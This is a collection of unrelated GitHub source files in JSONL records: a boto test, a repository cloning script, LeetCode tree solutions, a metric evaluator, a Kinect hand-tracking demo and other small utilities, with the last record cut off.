+{"seq_id":"73629644871","text":"#!/usr/bin/env python\n\nfrom tests.compat import mock, unittest\n\nfrom boto.ec2.connection import EC2Connection\n\nINSTANCE_STATUS_RESPONSE = br\"\"\"\n\n 3be1508e-c444-4fef-89cc-0b1223c4f02fEXAMPLE\n page-2\n \n\n\"\"\"\n\n\nclass TestInstanceStatusResponseParsing(unittest.TestCase):\n def test_next_token(self):\n ec2 = EC2Connection(aws_access_key_id='aws_access_key_id',\n aws_secret_access_key='aws_secret_access_key')\n mock_response = mock.Mock()\n mock_response.read.return_value = INSTANCE_STATUS_RESPONSE\n mock_response.status = 200\n ec2.make_request = mock.Mock(return_value=mock_response)\n all_statuses = ec2.get_all_instance_status()\n self.assertNotIn('IncludeAllInstances', ec2.make_request.call_args[0][1])\n self.assertEqual(all_statuses.next_token, 'page-2')\n\n def test_include_all_instances(self):\n ec2 = EC2Connection(aws_access_key_id='aws_access_key_id',\n aws_secret_access_key='aws_secret_access_key')\n mock_response = 
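The models.py record above uses the same variable-length idiom in both recurrent paths: zero initial states sized num_directions * num_layers, pack_padded_sequence before the RNN and pad_packed_sequence after, so padded time steps never enter the recurrence. (Note also that get_model passes a residual argument to TDNNLSTM, whose __init__ does not accept one, so the TDNN-LSTM branch as written raises a TypeError.) A minimal standalone sketch of the pack/pad idiom:

import torch
import torch.nn as nn

lstm = nn.LSTM(input_size=8, hidden_size=16, num_layers=1, batch_first=True)

x = torch.randn(3, 5, 8)            # batch of 3 sequences, padded to length 5
lengths = torch.tensor([5, 3, 2])   # true lengths per sequence

packed = nn.utils.rnn.pack_padded_sequence(
    x, lengths, batch_first=True, enforce_sorted=False)
out, _ = lstm(packed)               # recurrence only sees real time steps
out, out_lengths = nn.utils.rnn.pad_packed_sequence(out, batch_first=True)
print(out.shape, out_lengths)       # torch.Size([3, 5, 16]) tensor([5, 3, 2])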
mock.Mock()\n mock_response.read.return_value = INSTANCE_STATUS_RESPONSE\n mock_response.status = 200\n ec2.make_request = mock.Mock(return_value=mock_response)\n all_statuses = ec2.get_all_instance_status(include_all_instances=True)\n self.assertIn('IncludeAllInstances', ec2.make_request.call_args[0][1])\n self.assertEqual('true', ec2.make_request.call_args[0][1]['IncludeAllInstances'])\n self.assertEqual(all_statuses.next_token, 'page-2')\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"boto/boto","sub_path":"tests/unit/ec2/test_instancestatus.py","file_name":"test_instancestatus.py","file_ext":"py","file_size_in_byte":1811,"program_lang":"python","lang":"en","doc_type":"code","stars":6486,"dataset":"github-code","pt":"27"} +{"seq_id":"14438298549","text":"from __future__ import annotations\n\nimport toolcli\n\nfrom ctc import evm\nfrom ctc import spec\n\n\ndef get_command_spec() -> toolcli.CommandSpec:\n return {\n 'f': checksum_command,\n 'help': 'compute checksum of address',\n 'args': [\n {'name': 'address', 'help': 'address to get checksum of'},\n ],\n 'examples': [\n '0xd8da6bf26964af9d7eed9e03e53415d37aa96045',\n ],\n }\n\n\ndef checksum_command(address: spec.Address) -> None:\n print(evm.get_address_checksum(address))\n","repo_name":"checkthechain/checkthechain","sub_path":"src/ctc/cli/commands/compute/checksum_command.py","file_name":"checksum_command.py","file_ext":"py","file_size_in_byte":530,"program_lang":"python","lang":"en","doc_type":"code","stars":799,"dataset":"github-code","pt":"27"} +{"seq_id":"38215854248","text":"import os\nimport traceback\n\n# [Ficha 01 - Ex. 04] - Calcula o IMC dado o peso e a altura da pessoa\n\ntry:\n isNumberCorrect1, isNumberCorrect2 = False, False\n while not isNumberCorrect1:\n try:\n altura = float(str(input(\"Introduza a altura em metros: \")).replace(\",\", \".\"))\n if altura >= 1.20 and altura <= 2.20:\n isNumberCorrect1 = True\n except:\n continue\n while not isNumberCorrect2:\n try:\n peso = float(str(input(\"Introduza o peso em kilogramas: \")).replace(\",\", \".\"))\n if peso >= 35 and peso <= 350:\n isNumberCorrect2 = True\n except:\n continue\n print(\"\\nIMC: %.2f\" %float(peso / (altura*altura)))\nexcept Exception as e:\n print(str(e))\n traceback.print_exc()\n\nos.system(\"pause\")\n","repo_name":"Darwin1337/tsiw-aed","sub_path":"AED - Ficha 01/Ex04.py","file_name":"Ex04.py","file_ext":"py","file_size_in_byte":821,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"22535494448","text":"#!/usr/bin/env python3\n\nimport os\nimport sys\nimport argparse\nimport subprocess\n\nfrom utils import (\n get_json_from_github\n)\nfrom utils import PLUGINS_JSON_FILE, THEMES_JSON_FILE\nfrom dirutils import use_directory, readable_dir\n\n\nclass DownloaderOptions:\n def __init__(self):\n self.parser = self.make_parser()\n self.args = None\n\n def make_parser(self):\n parser = argparse.ArgumentParser(\n description=\"Clone repos included in the obsidian-releases repo, \"\n \"to provide a body of example plugins and CSS themes.\"\n )\n parser.add_argument('-o', '--output_directory', default='.', type=readable_dir,\n help='The directory where repos will be downloaded. Must already exist. '\n '(default: %(default)s which means \"current working directory\")'\n )\n\n parser.add_argument('-l', '--limit', type=int, default=0,\n help='Limit the number of plugin and theme repos that will be downloaded. '\n 'This is useful when testing the script. 
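The boto test above stubs the transport layer rather than the network: make_request is replaced with a mock.Mock whose canned response carries the XML fixture, and the assertions inspect call_args to verify which wire parameters were sent. The same pattern in isolation — the Client class here is hypothetical, used only to show the technique:

from unittest import mock

class Client:
    def make_request(self, action, params):
        raise NotImplementedError("real network call")

    def describe(self, verbose=False):
        params = {'Verbose': 'true'} if verbose else {}
        return self.make_request('Describe', params)

client = Client()
client.make_request = mock.Mock(return_value='<xml/>')

client.describe(verbose=True)
# call_args[0] is the positional-args tuple: ('Describe', {'Verbose': 'true'})
assert client.make_request.call_args[0][1] == {'Verbose': 'true'}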
'\n '0 (zero) means \"no limit\". '\n 'Note: the count currently includes any repos already downloaded.'\n '(default: %(default)s)')\n\n parser.add_argument('-n', '--dry-run', action=\"store_true\",\n help='Print out the commands to be executed, but do no run them. '\n 'This is useful for testing. '\n 'Note: it does not print the directory-creation commands, '\n 'just the git ones')\n\n parser.add_argument('-t', '--type',\n default='all',\n const='all',\n nargs='?',\n choices=['plugins', 'themes', 'all'],\n help='The type of repositories to download: plugins, themes or both. '\n '(default: %(default)s)')\n\n parser.add_argument('--group-by-user', dest='group_by_user', action='store_true',\n help='Put each repository in a sub-folder named for the GitHub user. '\n 'For example, the plugin \"https://github.com/phibr0/obsidian-tabout\" would be placed '\n 'in \"plugins/phibr0/obsidian-tabout\"')\n parser.add_argument('--no-group-by-user', dest='group_by_user', action='store_false',\n help='Put each repository in the same folder, prefixed by the user name. '\n 'This is the default behaviour. '\n 'For example, the plugin \"https://github.com/phibr0/obsidian-tabout\" would be placed '\n 'in \"plugins/phibr0-obsidian-tabout\"')\n parser.set_defaults(group_by_user=False)\n\n return parser\n\n def parse_args(self, argv):\n self.args = self.parser.parse_args(argv)\n\n def limit(self):\n return self.args.limit\n\n def dry_run(self):\n return self.args.dry_run\n\n def need_to_download_type(self, type):\n return self.args.type in [\"all\", type]\n\n def root_output_directory(self):\n return self.args.output_directory\n\n def repo_output_directory(self, user):\n if self.args.group_by_user:\n return user\n else:\n return '.'\n\n def repo_output_name(self, user, repo):\n if self.args.group_by_user:\n return repo\n else:\n # Prefix with username, in case there are any duplicated repo names\n return f\"{user}-{repo}\"\n\n\nclass Downloader:\n def __init__(self, options):\n self.options = options\n self.errors = \"\"\n\n def download(self):\n with use_directory(self.options.root_output_directory(), create_if_missing=False):\n print(f\"Working directory: {os.getcwd()}\")\n self.process_released_plugins()\n self.process_released_themes()\n\n self.print_any_errors()\n\n def process_released_plugins(self):\n self.process_released_repos(\"plugins\", PLUGINS_JSON_FILE)\n\n def process_released_themes(self):\n self.process_released_repos(\"themes\", THEMES_JSON_FILE)\n\n def process_released_repos(self, type, json_file):\n if not self.options.need_to_download_type(type):\n return\n\n print(f\"-----\\nProcessing {type}....\\n\")\n with use_directory(type, create_if_missing=True):\n plugin_list = get_json_from_github(json_file)\n sorted_list = sorted(plugin_list, key=lambda d: d['repo'].lower())\n self.clone_or_update_repos(sorted_list)\n\n def clone_or_update_repos(self, plugin_list):\n count = 0\n limit = self.options.limit()\n for plugin in plugin_list:\n self.clone_or_update_repo(plugin)\n count += 1\n if limit > 0 and count >= limit:\n print(\"Maximum number of new repos exceeded. 
Stopping.\")\n return\n\n def clone_or_update_repo(self, plugin):\n repo = plugin.get(\"repo\")\n branch = plugin.get(\"branch\", \"master\")\n user, repo_name = repo.split(\"/\")\n # if user != 'Slowbad':\n # print('Skipping user')\n # return\n directory_for_repo = self.options.repo_output_directory(user)\n with use_directory(directory_for_repo, create_if_missing=True):\n repo_output_name = self.options.repo_output_name(user, repo_name)\n if not os.path.isdir(repo_output_name):\n command = self.get_download_command(repo, repo_output_name)\n self.run_or_log(\"cloning\", command, repo)\n else:\n with use_directory(repo_output_name, create_if_missing=False):\n command = self.get_clone_command()\n self.run_or_log(f\"updating\", command, repo)\n\n def run_or_log(self, verb, command, repo):\n message = f\"{verb} {repo}\"\n print(message)\n if self.options.dry_run():\n self.log_dry_run(command)\n else:\n result = subprocess.run(command, shell=True, check=False, capture_output=True, text=True)\n if result.returncode != 0:\n self.log_error(result, message, command)\n\n def log_dry_run(self, command):\n print(f'Dry run mode: {command}')\n\n def get_download_command(self, repo, repo_output_name):\n url = f'https://github.com/{repo}'\n print(url)\n command = f\"git clone --quiet {url}.git {repo_output_name}\"\n return command\n\n def get_clone_command(self):\n command = 'git pull --quiet'\n return command\n\n def log_error(self, result, message2, command):\n message = f\"\"\"{message2}\ncommand: {command}\nin: {os.getcwd()}\nexit code: {result.returncode}\nstdout: {result.stdout}\nstderr: {result.stderr}\n-------------------------------------------------------------------------------\n\"\"\"\n print(message)\n self.errors += message\n\n def print_any_errors(self):\n if self.errors != \"\":\n print(\"The following errors occurred:\")\n print(self.errors)\n\n\ndef download_repos(argv=sys.argv[1:]):\n options = DownloaderOptions()\n options.parse_args(argv)\n\n downloader = Downloader(options)\n downloader.download()\n\n\nif __name__ == \"__main__\":\n download_repos()\n","repo_name":"claremacrae/obsidian-repos-downloader","sub_path":"obsidian-repos-downloader.py","file_name":"obsidian-repos-downloader.py","file_ext":"py","file_size_in_byte":7562,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"27"} +{"seq_id":"71641877833","text":"__source__ = 'https://leetcode.com/problems/invert-binary-tree/'\n# https://github.com/kamyu104/LeetCode/blob/master/Python/invert-binary-tree.py\n# Time: O(n)\n# Space: O(h)\n#\n# Description: Leetcode # 226. 
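The repo downloader above funnels every git command through subprocess.run with capture_output=True, text=True and check=False, formatting failures itself so one bad repository does not abort the whole crawl. A condensed sketch of that design choice:

import subprocess

def run_logged(command, cwd=None):
    # check=False: a non-zero exit is data to report, not an exception to raise.
    result = subprocess.run(command, shell=True, check=False,
                            capture_output=True, text=True, cwd=cwd)
    if result.returncode != 0:
        print(f"failed ({result.returncode}): {command}\n{result.stderr}")
    return result.returncode == 0

run_logged("git --version")          # True on any machine with git installed
run_logged("git clone not-a-url")    # False; the error is printed, not raised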
Invert Binary Tree\n#\n# Invert a binary tree.\n#\n# 4\n# / \\\n# 2 7\n# / \\ / \\\n# 1 3 6 9\n# to\n# 4\n# / \\\n# 7 2\n# / \\ / \\\n# 9 6 3 1\n#\n#\n# Trivia:\n# This problem was inspired by this original tweet by Max Howell:\n# Google: 90% of our engineers use the software you wrote (Homebrew),\n# but you can't invert a binary tree on a whiteboard so fuck off.\n#\n# Related Topics\n# Tree\n#\n# Time: O(n)\n# Space: O(w), w is the max number of the nodes of the levels.\n# BFS solution.\nimport unittest\nimport collections\nclass Queue:\n def __init__(self):\n self.data = collections.deque()\n\n def push(self, x):\n self.data.append(x)\n\n def peek(self):\n return self.data[0]\n\n def pop(self):\n return self.data.popleft()\n\n def size(self):\n return len(self.data)\n\n def empty(self):\n return len(self.data) == 0\n\n\n# Definition for a binary tree node.\nclass TreeNode:\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\n\nclass Solution:\n # @param {TreeNode} root\n # @return {TreeNode}\n def invertTree(self, root):\n if root is not None:\n nodes = Queue()\n nodes.push(root)\n while not nodes.empty():\n node = nodes.pop()\n node.left, node.right = node.right, node.left\n if node.left is not None:\n nodes.push(node.left)\n if node.right is not None:\n nodes.push(node.right)\n return root\n\n# Time: O(n)\n# Space: O(h)\n# Stack solution.\nclass Solution2:\n # @param {TreeNode} root\n # @return {TreeNode}\n def invertTree(self, root):\n if root is not None:\n nodes = []\n nodes.append(root)\n while nodes:\n node = nodes.pop()\n node.left, node.right = node.right, node.left\n if node.left is not None:\n nodes.append(node.left)\n if node.right is not None:\n nodes.append(node.right)\n return root\n\n# Time: O(n)\n# Space: O(h)\n# DFS, Recursive solution.\nclass Solution3:\n # @param {TreeNode} root\n # @return {TreeNode}\n def invertTree(self, root):\n if root is not None:\n root.left, root.right = self.invertTree(root.right), self.invertTree(root.left)\n return root\n\nclass TestMethods(unittest.TestCase):\n def test_Local(self):\n self.assertEqual(1, 1)\n\nif __name__ == '__main__':\n unittest.main()\n\nJava = '''\nThought: https://leetcode.com/problems/invert-binary-tree/solution/\n\n/**\n * Definition for a binary tree node.\n * public class TreeNode {\n * int val;\n * TreeNode left;\n * TreeNode right;\n * TreeNode(int x) { val = x; }\n * }\n */\n\npublic class Solution {\n //DFS3\n # 0ms 100%\n public TreeNode invertTree(TreeNode root) {\n if (root != null) {\n TreeNode tmp = root.left;\n root.left = root.right;\n root.right = tmp;\n invertTree(root.left);\n invertTree(root.right);\n }\n return root;\n }\n //DFS1\n # 0ms 100%\n public TreeNode invertTree1(TreeNode root) {\n if (root == null) return null;\n //TreeNode tmp = root.left;\n TreeNode left = root.left;\n TreeNode right = root.right;\n root.left = invertTree(right);\n root.right = invertTree(left);\n return root;\n }\n //DFS2\n # 0ms 100%\n public TreeNode invertTree2(TreeNode root) {\n if (root == null) { return null;}\n TreeNode right = invertTree(root.right);\n TreeNode left = invertTree(root.left);\n root.left = right;\n root.right = left;\n return root;\n }\n\n //BFS1\n # 0ms 100%\n public TreeNode invertTreeBFS(TreeNode root) {\n if (root == null) return null;\n Queue queue = new LinkedList();\n queue.add(root);\n while (!queue.isEmpty()) {\n TreeNode current = queue.poll();\n TreeNode temp = current.left;\n current.left = current.right;\n current.right = temp;\n if (current.left != null) 
queue.add(current.left);\n if (current.right != null) queue.add(current.right);\n }\n return root;\n }\n}\n'''","repo_name":"JulyKikuAkita/PythonPrac","sub_path":"cs15211/InvertBinaryTree.py","file_name":"InvertBinaryTree.py","file_ext":"py","file_size_in_byte":4540,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"2008018366","text":"#!/usr/bin/env python3\n\nimport argparse\nfrom pathlib import Path\nfrom typing import Any, Dict, List\nimport json\nimport os\n\nimport evaluate\nfrom evaluate.utils.file_utils import DownloadConfig\nimport pandas as pd\n\nOFFLINE = os.environ.get(\"OFFLINE\", False)\nif OFFLINE:\n evaluate.config.HF_EVALUATE_OFFLINE = True\n\n\ndef to_prototext(m: List[Dict[str, Any]], upper_k: str = \"\") -> str:\n ret = \"\"\n\n def _to_prototext(d: Dict[str, Any], upper_k: str = \"\") -> str:\n ret = \"\"\n for k, v in d.items():\n new_k = upper_k\n if not new_k:\n new_k = k\n elif not new_k.endswith(k):\n new_k = upper_k + \"_\" + k\n if isinstance(v, dict):\n ret += _to_prototext(v, upper_k=new_k)\n else:\n ret += (\n 'measure{\\n key: \"'\n + str(new_k.replace(\"_\", \" \").title())\n + '\"\\n value: \"'\n + str(v)\n + '\"\\n}\\n'\n )\n return ret\n\n for d in m:\n ret += _to_prototext(d, upper_k=upper_k)\n\n return ret\n\n\ndef load_data(path: Path, data_format: str) -> List:\n if data_format == \"csv\":\n return pd.read_csv(path, sep=\",\").iloc[:, -1].tolist()\n if data_format == \"tsv\":\n return pd.read_csv(path, sep=\"\\t\").iloc[:, -1].tolist()\n if data_format in (\"IOB1\", \"IOB2\", \"IOE1\", \"IOE2\", \"IOBES\", \"BILOU\"):\n data = path.read_text().strip().split(\"\\n\\n\")\n data = [x.split(\"\\n\") for x in data]\n return data\n else:\n raise ValueError(\"Unknown data format: \" + data_format)\n\n\ndef evaluate_metrics(\n predictions: List, references: List, metrics: List[str], **kwargs\n) -> List[Dict[str, Any]]:\n results = []\n\n download_config = None\n if OFFLINE:\n download_config = DownloadConfig(local_files_only=True)\n\n for metric in metrics:\n results.append(\n evaluate.load(metric, download_config=download_config).compute(\n predictions=predictions, references=references, **kwargs\n )\n )\n\n return results\n\n\ndef main(args=None):\n parser = argparse.ArgumentParser()\n\n parser.add_argument(\"--metrics\", type=str, nargs=\"+\", required=True)\n parser.add_argument(\n \"--data-format\",\n type=str,\n choices=[\"csv\", \"tsv\", \"IOB1\", \"IOB2\", \"IOE1\", \"IOE2\", \"IOBES\", \"BILOU\"],\n required=True,\n )\n parser.add_argument(\"--predictions\", type=Path, required=True)\n parser.add_argument(\"--references\", type=Path, required=True)\n parser.add_argument(\"--output-prototext\", type=Path, required=True)\n parser.add_argument(\"--kwargs\", type=json.loads, default=None)\n\n args = parser.parse_args(args)\n\n kwargs = args.kwargs\n if kwargs is None:\n kwargs = {}\n\n predictions = load_data(args.predictions, args.data_format)\n references = load_data(args.references, args.data_format)\n results = evaluate_metrics(predictions, references, args.metrics, **kwargs)\n\n with open(args.output_prototext, \"w\") as f:\n f.write(to_prototext(results).strip())\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"tira-io/hf-evaluator","sub_path":"hf_evaluator/evaluation.py","file_name":"evaluation.py","file_ext":"py","file_size_in_byte":3162,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"75004430150","text":"import 
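The hf-evaluator record above flattens nested metric dicts into prototext measure stanzas, joining nested keys with underscores unless the parent key already ends with the child key, then title-casing. A small standalone re-statement of that key-joining rule (flatten here is an illustrative reimplementation, not the module's API):

def flatten(d, prefix=""):
    # Same rule as _to_prototext: join with "_" unless the parent key
    # already ends with the child key (avoids keys like "f1_f1").
    out = {}
    for k, v in d.items():
        key = prefix if prefix and prefix.endswith(k) else (prefix + "_" + k if prefix else k)
        if isinstance(v, dict):
            out.update(flatten(v, key))
        else:
            out[key.replace("_", " ").title()] = str(v)
    return out

print(flatten({"rouge": {"rouge1": 0.41, "rouge2": 0.19}, "accuracy": 0.9}))
# {'Rouge Rouge1': '0.41', 'Rouge Rouge2': '0.19', 'Accuracy': '0.9'}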
os\nimport pickle\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\ndef load_data(filename):\n \"\"\"Load generic pickle file\"\"\"\n with open(filename, 'rb') as f:\n data = pickle.load(f)\n\n return data\n\n\ndef save_pickle(file_obj, filename):\n \"\"\"Write as pickle to file\"\"\"\n with open(filename, 'wb') as f:\n pickle.dump(file_obj, f)\n\n\ndef generate_posterior_histograms(fit_obj, param_list, prefix=''):\n \"\"\"Create and save marginal histograms for each parameter from sampled posterior\"\"\"\n n_params = len(param_list)\n\n fig, ax = plt.subplots(n_params, 1, figsize=(8, 12))\n\n for j in range(n_params):\n ax[j].hist(fit_obj[param_list[j]].flatten().tolist(), bins=50)\n ax[j].set_xlabel(param_list[j])\n plt.tight_layout()\n outfile = prefix + 'sampled_histogram.png'\n plt.savefig(os.path.join('figs', outfile))\n plt.show(); plt.close()\n\n\ndef generate_traceplots(fit_obj, param_list, prefix=''):\n \"\"\"Create and save traceplots for each parameter from sampling algorithm\"\"\"\n n_params = len(param_list)\n n_samples = len(fit_obj[param_list[0]][0])\n\n fig, ax = plt.subplots(n_params, 1, sharex=True, figsize=(8, 11))\n\n for j in range(n_params):\n ax[j].scatter(np.linspace(0, n_samples, num=n_samples), fit_obj[param_list[j]], s=5)\n ax[j].set_ylabel(param_list[j])\n plt.xlabel('number of samples')\n plt.tight_layout()\n outfile = prefix + 'sampled_traceplot.png'\n plt.savefig(os.path.join('figs', outfile))\n plt.show(); plt.close()\n","repo_name":"jelc53/lib-capacity-fade","sub_path":"source/utils/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":1529,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"10630815972","text":"import cv2\nimport numpy as np\nimport freenect\nimport importlib.util\nspec1 = importlib.util.spec_from_file_location(\"frame_convert2\", \"/Users/mitch/Documents/University/Project/Project GitLab/prototypes/Kinect Basics/libfreenect/wrappers/python/frame_convert2.py\")\nframe_convert2 = importlib.util.module_from_spec(spec1)\nspec1.loader.exec_module(frame_convert2)\n\ntop_left_coordinates = [50,50]\nwidth_cube = 100\ncube_depth = 0 # z axis = 0\n\n\ndef moveCube(x_coord, y_coord):\n global top_left_coordinates\n top_left_coordinates[0] = x_coord\n top_left_coordinates[1] = y_coord\n # z coord requires shifting of x and y in order to stay in that place but appear to \"shrink\" or grow\n \n\ndef handTracking(frame):\n # hand tracker\n image = cv2.resize(frame, (320,240), interpolation = cv2.INTER_AREA)\n image_ycrcb = np.array(cv2.cvtColor(image, cv2.COLOR_RGB2YCR_CB))\n # print(image_ycrcb[0][0])\n skin1 = (50, 89, 136)\n skin2 = (231, 147, 181)\n mask = cv2.inRange(image_ycrcb, skin1, skin2)\n result = cv2.bitwise_and(image, image, mask=mask)\n # cv2.imshow(\"Color\", result)\n # cv2.imshow(\"Mask\", mask) # 240 x 320 white or black image\n\n # find highest concentration of values in mask matrix closest to bottom of image\n r_region_counters = []\n c_region_counters = []\n region_sums = []\n south_deltas = []\n # find all regions with pixel count larger than 270 000\n for r_counter in range(0,320,5):\n for c_counter in range(0,240,5):\n region_sum = np.sum(mask[r_counter:r_counter+60,c_counter:c_counter+80]) # sum all white pixels in proposal region\n if(region_sum > 100000): # if more white pixels here than average\n south_delta = abs(r_counter-240)\n south_deltas.append(south_delta)\n region_sums.append(region_sum)\n r_region_counters.append(r_counter)\n 
c_region_counters.append(c_counter)\n # find southmost\n if(len(south_deltas) ==0):\n return\n southmost_delta = np.amin(south_deltas)\n # find largest region within 50px of southmost point\n largest_south_index = 0\n for current_region in range(len(region_sums)):\n # print(\"south_deltas[current_region] - southmost_delta: \", south_deltas[current_region] - southmost_delta)\n if(region_sums[current_region] > region_sums[largest_south_index]):\n if( abs(south_deltas[current_region] - southmost_delta) < 50):\n largest_south_index = current_region\n moveCube((c_region_counters[largest_south_index]+10)/320, (r_region_counters[largest_south_index]+20)/240)\n \n\ndef drawCube(background_image,top_left_coordinates, width_cube):\n # BGR colors\n RED = (0, 0, 255)\n GREEN = (0,255,0)\n BLUE = (255,0,0)\n ORANGE = (34,156,228)\n front_face_pts = [top_left_coordinates, (top_left_coordinates[0]+width_cube, top_left_coordinates[1]), (top_left_coordinates[0]+width_cube, top_left_coordinates[1]+width_cube), (top_left_coordinates[0],top_left_coordinates[1]+width_cube) ]\n top_face_pts = [top_left_coordinates,(int(top_left_coordinates[0]+width_cube/2),int(top_left_coordinates[1]-width_cube/2)),(int(top_left_coordinates[0]+width_cube*1.5),int(top_left_coordinates[1]-width_cube/2)),(int(top_left_coordinates[0]+width_cube), top_left_coordinates[1])]\n side_face_pts = [(int(top_left_coordinates[0]+width_cube), top_left_coordinates[1]),(int(top_left_coordinates[0]+width_cube*1.5),int(top_left_coordinates[1]-width_cube/2)),(int(top_left_coordinates[0]+width_cube*1.5),int(top_left_coordinates[1]+width_cube/2)),(top_left_coordinates[0]+width_cube, top_left_coordinates[1]+width_cube)]\n\n cv2.fillPoly(background_image, np.array([front_face_pts]), ORANGE)\n cv2.fillPoly(background_image, np.array([top_face_pts]), GREEN)\n cv2.fillPoly(background_image, np.array([side_face_pts]), BLUE)\n\ndef check_space_occupied(depth_data, proposed_x, proposed_y, proposed_z):\n # check depthInput at pixels to see if object there\n depth_z = int(650 -10*(proposed_z-3))\n for x in range(proposed_x-20, proposed_x+20):\n for y in range(proposed_y-20, proposed_y+20):\n if(proposed_x >=0 and proposed_x < 640 and proposed_y >= 0 and proposed_y < 480):\n # if pixel trying to move to has depth value close to that of object - collision!\n if( depth_data[proposed_x][proposed_y] >= depth_z-50 and depth_data[proposed_x][proposed_y] <= depth_z+50):\n return True\n return False\n\nwhile True:\n # read in from Kinect\n depthInput = freenect.sync_get_depth()[0]\n videoInput = freenect.sync_get_video()[0]\n background_image = cv2.cvtColor(np.array(videoInput) , cv2.COLOR_BGR2RGB)\n image = cv2.resize(background_image, (320,240), interpolation = cv2.INTER_AREA)\n image_ycrcb = np.array(cv2.cvtColor(image, cv2.COLOR_RGB2YCR_CB))\n # print(image_ycrcb[0][0])\n skin1 = (50, 89, 136)\n skin2 = (231, 147, 181)\n # skin1 = (89, 119, 140)\n # skin2 = (255, 179, 187)\n mask = cv2.inRange(image_ycrcb, skin1, skin2)\n result = cv2.bitwise_and(image, image, mask=mask)\n # cv2.imshow(\"Color\", result)\n cv2.imshow(\"Mask\", mask) # 240 x 320 white or black image\n # hand tracking\n # find highest concentration of values in mask matrix closest to bottom of image\n r_region_counters = []\n c_region_counters = []\n region_sums = []\n left_deltas = []\n # find all regions with pixel count larger than 270 000\n for r_counter in range(0,320,5):\n for c_counter in range(0,240,5):\n region_sum = np.sum(mask[r_counter:r_counter+60,c_counter:c_counter+80]) # sum all 
white pixels in proposal region\n if(region_sum > 1000): # if more white pixels here than average\n left_delta = abs(c_counter-120 + r_counter-160) # distance from centre\n left_deltas.append(left_delta)\n region_sums.append(region_sum)\n r_region_counters.append(r_counter)\n c_region_counters.append(c_counter)\n # find leftmost\n if(len(left_deltas) !=0):\n leftmost_delta = np.amin(left_deltas)\n # find largest region within 50px of leftmost point\n largest_left_index = 0\n for current_region in range(len(region_sums)):\n # print(\"left_deltas[current_region] - leftmost_delta: \", left_deltas[current_region] - leftmost_delta)\n if(region_sums[current_region] > region_sums[largest_left_index]):\n if( abs(left_deltas[current_region] - leftmost_delta) < 30):\n largest_left_index = current_region\n cv2.imshow(\"result\", cv2.rectangle(result, (c_region_counters[largest_left_index],r_region_counters[largest_left_index]), (c_region_counters[largest_left_index]+80,r_region_counters[largest_left_index]+60), (0,0,255), 2))\n drawCube(background_image,[c_region_counters[largest_left_index]+50,r_region_counters[largest_left_index]+70],100) # draw Cube over Kinect feed\n cv2.imshow('Cube Image', background_image)\n print(\"Current coords: x: \", top_left_coordinates[0], \", y: \", top_left_coordinates[1], \", z: \", cube_depth,\" on z axis or \", int(650 -10*(cube_depth-3)), \" on depth scale\")\n if cv2.waitKey(1) == ord(\"w\"):\n top_left_coordinates[1] -=10\n if cv2.waitKey(1) == ord(\"s\"):\n top_left_coordinates[1] +=10\n if cv2.waitKey(1) == ord(\"a\"):\n object_collision = check_space_occupied(depthInput,top_left_coordinates[0]-10,top_left_coordinates[1])\n if(object_collision == False):\n top_left_coordinates[0] -=10\n if cv2.waitKey(1) == ord(\"d\"):\n object_collision = check_space_occupied(depthInput,top_left_coordinates[0]+10,top_left_coordinates[1])\n if(object_collision == False):\n top_left_coordinates[0] +=10\n if cv2.waitKey(1) == ord(\"i\"):\n width_cube += 10\n cube_depth +=1\n if cv2.waitKey(1) == ord(\"o\"):\n width_cube -= 10\n cube_depth -= 1\ncv2.destroyAllWindows()","repo_name":"mitch7w/Final-Year-Project","sub_path":"prototypes/OpenGL Virtual Object/OpenCV_cube_kinect.py","file_name":"OpenCV_cube_kinect.py","file_ext":"py","file_size_in_byte":8149,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"32765833364","text":"__author__ = 'Dreyke Boone'\n\nimport random\n\n# class to roll die\nclass Dice():\n\n # gets a random integer and returns its value\n def roll(self):\n self.value = random.randint(1,6)\n return self.value\n\nclass Points():\n\n # constructor method with instance variables\n def __init__(self, turnTotal, player, playerCount, score, finalScore):\n self.turnTotal = turnTotal\n self.player = player\n self.playerCount = playerCount\n self.score = score\n self.finalScore = finalScore\n\ndef main():\n\n # game object - sets up instance variables of constructor method\n game = Points(0, 0, 2, [0] * 2, 20)\n\n # while loop to run the game. Loop ends when a player wins.\n while max(game.score) < game.finalScore:\n\n # ask user if they would like to roll or pass. Displays their total score and their accumulative score for their\n # turns.\n playerRoll = input(\"\\nPlayer %i: Do you want to roll the die? 
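The Kinect tracker above works in YCrCb space because skin tone clusters tightly in the Cr/Cb chroma planes regardless of brightness; cv2.inRange then yields a binary mask that the region-scoring loops sum over. (Note that those loops run the 0–320 counter over the row axis of a mask that is 240 rows by 320 columns, so rows beyond 240 produce empty slices and the rightmost columns are never scanned — the axes appear swapped.) The masking step in isolation, with the thresholds copied from the script and an illustrative image path:

import cv2
import numpy as np

frame = cv2.imread('frame.png')                       # any BGR image
frame = cv2.resize(frame, (320, 240), interpolation=cv2.INTER_AREA)

ycrcb = cv2.cvtColor(frame, cv2.COLOR_BGR2YCR_CB)
skin_lo, skin_hi = (50, 89, 136), (231, 147, 181)     # (Y, Cr, Cb) bounds from above
mask = cv2.inRange(ycrcb, skin_lo, skin_hi)           # uint8: 255 inside range, else 0

# Pixel score of one 60x80 window, as the proposal loop computes it
# (note numpy indexing is mask[rows, cols] on a (240, 320) array):
window_score = int(np.sum(mask[0:60, 0:80]))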
